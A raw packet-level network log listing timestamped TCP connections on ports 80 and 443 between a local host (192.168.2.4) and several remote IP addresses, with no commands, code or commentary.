                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.908620119 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.908679962 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.908747911 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.908787966 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.909750938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.909878016 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.909929991 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.910918951 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.911045074 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.911281109 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.912372112 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.912385941 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.912420034 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.912480116 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.913415909 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.913428068 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.913458109 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.913472891 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.914499998 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.914550066 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.914700985 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.914905071 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.915693045 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.915756941 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.915770054 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.915796995 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.916804075 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:36.916850090 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.046622992 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.046638966 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.046703100 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.046807051 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.046964884 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.047075987 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.047426939 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.048090935 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.048163891 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.048218966 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.048257113 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.049273968 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.049312115 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.049359083 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.049393892 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.050633907 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.050687075 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.050759077 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.050803900 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.051661015 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.051673889 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.051709890 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.051738977 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.052871943 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.052895069 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.052932024 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.052963018 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.053966999 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.054157972 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.054208040 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.055183887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.055363894 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.055409908 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.056338072 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.056381941 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.056423903 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.057528019 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.057574034 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.057852030 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.058706999 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.058710098 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.058933020 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.058976889 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.060018063 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.060029984 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.060081005 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.061088085 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.062167883 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.062242031 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.062422037 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.062434912 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.062472105 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.063518047 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.063529968 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.063579082 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.064690113 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.064722061 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.064788103 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.065824986 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.066536903 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.066612005 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.067111015 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.067123890 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.067171097 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.068281889 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.068295002 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.068346977 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.069410086 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.069468975 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.069533110 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.070560932 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.070620060 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.070745945 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.071377993 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.071835995 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.071847916 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.071903944 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.072927952 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.073086977 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.073146105 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.074151993 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.074357986 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.074409962 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.075278044 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.075364113 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.075388908 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.076531887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.076546907 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.076580048 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.076598883 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.077713013 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.077774048 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.077831984 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.079005003 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.079016924 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.079067945 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.080173016 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.080187082 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.080240011 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.081289053 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.081337929 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.081388950 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.082573891 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.082586050 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:37.082626104 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.481966019 CET4980880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.482532024 CET4983880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.602006912 CET8049808185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.602118969 CET4980880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.602304935 CET8049838185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.602375984 CET4983880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.613930941 CET4983880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.733773947 CET8049838185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:40.974961042 CET8049838185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:40.975250006 CET4983880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.320293903 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.320655107 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.392695904 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.392754078 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.392811060 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.395003080 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.395019054 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.440623045 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.440639973 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.440681934 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.440741062 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.444216967 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.563980103 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.123491049 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.123543978 CET4434984735.190.72.216192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.123888969 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.129159927 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.129182100 CET4434984735.190.72.216192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.313515902 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.411626101 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.411672115 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.411834002 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.427340984 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.427371979 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.433383942 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.436531067 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.448187113 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.567862988 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.882215023 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.882752895 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.883810997 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.883821011 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.885499954 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.885504007 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.885555029 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.885569096 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897053957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897083998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897095919 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897105932 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897116899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897128105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897140026 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897375107 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897386074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897398949 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.902002096 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.902031898 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903217077 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903259039 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903336048 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903353930 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903454065 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903476000 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903487921 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.903491974 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905242920 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905260086 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905278921 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905289888 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905291080 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905306101 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905328989 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905339003 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905345917 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905353069 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905452967 CET49846443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.905469894 CET44349846116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.023370981 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.023395061 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.032269955 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.089236021 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.089358091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.093591928 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.093605042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.101886988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.101922035 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.103784084 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.110276937 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.110353947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.113315105 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.118583918 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.118717909 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.124094009 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.127023935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.127101898 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.128597975 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.135456085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.135545015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.143781900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.143881083 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.144432068 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.152163029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.152242899 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.153264999 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.160620928 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.160631895 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.164531946 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.168978930 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.169034004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.188360929 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.188416958 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.223705053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.225945950 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.281296968 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.281418085 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.285620928 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.285767078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.286561012 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.290256977 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.293951988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.294073105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.302323103 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.302458048 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.306719065 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.307164907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.307270050 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.312017918 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.312096119 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.316762924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.316948891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.321562052 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.321669102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.326673031 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.326704979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.328624964 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.331456900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.331530094 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.336004972 CET8049840185.215.113.16192.168.2.4
